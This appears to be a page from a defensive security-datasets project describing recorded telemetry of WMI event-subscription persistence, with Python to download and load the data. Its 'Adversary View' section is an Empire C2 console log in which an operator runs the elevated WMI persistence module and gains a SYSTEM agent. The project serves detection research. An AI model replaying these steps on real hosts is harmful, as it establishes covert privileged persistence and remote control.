Empire Elevated WMI Eventing
Contents
Empire Elevated WMI Eventing#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
|
Tags |
Local WMI Eventing,WMI Event Subscriptions |
Dataset Description#
This dataset represents adversaries leveraging WMI subscriptions locally for persistence.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
Adversary View#
(Empire: powershell/privesc/bypassuac_fodhelper) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http
W2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5584 5/0.0 2020-09-04 20:42:01 http
13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5676 5/0.0 2020-09-04 20:41:59 http
(Empire: agents) > interact 13ZK6G7M
(Empire: 13ZK6G7M) >
(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*
(Empire: powershell/persistence/elevated/wmi) > info
Name: Invoke-WMI
Module: powershell/persistence/elevated/wmi
NeedsAdmin: True
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
@jbooz1
Description:
Persist a stager (or script) using a permanent WMI
subscription. This has a difficult detection/removal rating.
Comments:
https://github.com/mattifestation/PowerSploit/blob/master/Pe
rsistence/Persistence.psm1
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True 13ZK6G7M Agent to run module on.
Listener True http Listener to use.
DailyTime False Daily time to trigger the script
(HH:mm).
AtStartup False True Switch. Trigger script (within 5
minutes) of system startup.
FailedLogon False Trigger script with a failed logon
attempt from a specified user
SubName True Updater Name to use for the event subscription.
ExtFile False Use an external file for the payload
instead of a stager.
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT
[*] Agent 13ZK6G7M tasked with task ID 1
[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi
(Empire: powershell/persistence/elevated/wmi) >
WMI persistence established using listener http with OnStartup WMI subsubscription trigger.
(Empire: powershell/persistence/elevated/wmi) >
(Empire: powershell/persistence/elevated/wmi) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent PYA28EDF checked in
[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5
(Empire: powershell/persistence/elevated/wmi) >
(Empire: powershell/persistence/elevated/wmi) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http
W2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5584 5/0.0 2020-09-04 20:43:48 http
13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5676 5/0.0 2020-09-04 20:43:48 http
PYA28EDF ps 172.18.39.5 WORKSTATION5 *THESHIRE\SYSTEM powershell 7480 5/0.0 2020-09-04 20:49:29 http
(Empire: agents) > interact PYA28EDF
(Empire: PYA28EDF) > shell whoami
[*] Tasked PYA28EDF to run TASK_SHELL
[*] Agent PYA28EDF tasked with task ID 1
(Empire: PYA28EDF) >
nt authority\system
..Command execution completed.
(Empire: PYA28EDF) >
(Empire: PYA28EDF) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)